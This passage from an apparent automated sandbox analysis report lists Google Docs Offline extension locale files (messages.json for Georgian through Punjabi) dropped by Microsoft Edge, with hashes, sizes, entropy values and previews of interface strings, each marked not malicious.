SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8040_1068923889\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
